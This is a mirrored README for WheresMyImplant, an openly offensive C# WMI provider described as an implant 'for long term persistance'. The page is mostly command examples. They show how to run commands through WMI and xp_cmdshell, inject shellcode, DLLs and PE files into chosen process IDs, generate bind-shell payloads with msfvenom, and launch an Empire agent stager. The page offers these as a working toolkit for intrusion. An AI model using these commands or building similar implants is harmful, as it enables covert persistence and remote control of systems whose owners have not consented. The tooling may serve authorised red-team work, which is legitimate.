Coder Social home page Coder Social logo

wheresmyimplant's Introduction

WheresMyImplant: A C# WMI Provider for long term persistance

This WMI provider includes functions to execute commands, payloads, and Empire Agent to maintain a low profile on the host.

This is related to the project PowerProvider - https://github.com/0xbadjuju/PowerProvider/
PowerProvider provides the deployment methods for the implant.

To compile, generate your signing key with the command: sn -k sgKey.snk

While primarily designed for use with WMI, WheresMyImplant can also be used with PowerShell reflection: [System.Reflection.Assembly]::LoadFile("C:\temp\WheresMyImplant.dll") [WheresMyImplant.Implant]::InjectShellCode($payload,9976)

Methods

  • RunCMD

    • Parameters: Command, Parameters
    • Example:
      Invoke-CimMethod -Class Win32_Implant -Name RunPowerShell -Argument @{
           command="ipconfig";
           parameter="/all"
      };

  • RunPowerShell

    • Parameters: Command
    • Example:
      Invoke-CimMethod -Class Win32_Implant -Name RunPowerShell -Argument @{
           command="whoami"
      };

  • RunXpCmdShell

    • Parameters: Server, Database, UserName, Password, Command
    • Example:
      Invoke-CimMethod -Class Win32_Implant -Name RunXpCmdShell -Argument @{
           command="whoami";
           database="";
           server="sqlserver"
           username="sa";
           password="password"
      };

  • InjectShellCode

    • Parameter: ShellCodeString, ProcessId
    • Example:
      msfvenom -p windows/x64/exec --format csharp CMD=calc.exe > file.txt
      Delete the byte declaration.
      Invoke-CimMethod -Class Win32_Implant -Name InjectShellCode -Argument @{
           shellCodeString=$payload;
           processId=432
      };

  • InjectShellCodeWMFIFSB4

    • Parameters: WmiClass, FileName, ProcessId
    • Example:
      msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
      Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeWMFIFSB4 -Argument @{
           WmiClass="WMIFS";
           FileName="CalcShellCode";
           processId=432;
      };

  • InjectDll

    • Parameters: Library, ProcessId
    • Example:
      msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
      Invoke-CimMethod -ClassName Win32_Implant -Name InjectDll -Arguments @{
           library = "\host\share\bind64.dll";
           processId = 3372;
      };

  • InjectDllWMIFS

    • Parameters: WmiClass, FileName, ProcessId
    • Example:
      msfvenom -p windows/x64/shell_bind_tcp --format dll --arch x64 > /tmp/bind64.dll
      Invoke-CimMethod -ClassName Win32_Implant -Name InjectDllWMIFS -Arguments @{
           WmiClass = "WMIFS";
           FileName = "bind64.dll";
           processId = 3372;
      };

  • InjectPeFile

    • Parameters: FileName, Parameters, ProcessId
    • Example:
      msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
      Invoke-CimMethod -ClassName Win32_Implant -Name InjectPe -Arguments @{
           FileName = "C:\bind64.exe";
           Parameters = "";
           ProcessId=5648;
      };

  • InjectPeString

    • Parameters: PeString, Parameters, ProcessId
    • Example:
      msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
      Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeString -Arguments @{
           FileName = "C:\bind64.exe";
           Parameters = "";
           ProcessId=5648;
      };

  • InjectPeWMIFS

    • Parameters: WmiClass, FileName, Parameters, ProcessId
    • Example:
      msfvenom -p windows/x64/shell_bind_tcp --format exe --arch x64 > /tmp/bind64.dll
      Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeFromFileRem -Arguments @{
           FileName = "C:\bind64.exe";
           Parameters = ""; ProcessId=5648;
      };

  • Empire

    • Parameters: Server, StagingKey, Language
    • Example:
      Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
           Server = $Server;
           StagingKey = $StagingKey;
           Language = "PowerShell";
      };

           Invoke-CimMethod -ClassName Win32_Implant -Name EmpireStager -Arguments @{
                Server = $Server;
                $StagingKey = $StagingKey;
                Language = "dotnet";
           };

Author, Contributors, and License

Author: Alexander Leary (@0xbadjuju), NetSPI - 2017

License: BSD 3-Clause

Required Dependencies: None

wheresmyimplant's People

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.